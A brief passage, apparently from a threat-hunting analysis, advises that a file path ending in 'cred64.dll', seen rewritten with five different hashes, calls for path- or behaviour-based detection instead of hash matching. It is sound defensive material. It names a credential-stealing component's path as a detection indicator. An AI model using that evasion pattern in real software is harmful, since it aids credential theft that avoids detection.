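The rewrite groups are the useful signal for hunting: a path like `...\810b84e2bfa3a9\cred64.dll` that is written five times with five different hashes means a hash-only detection for that file will not generalise, and a path- or behaviour-based rule is needed instead.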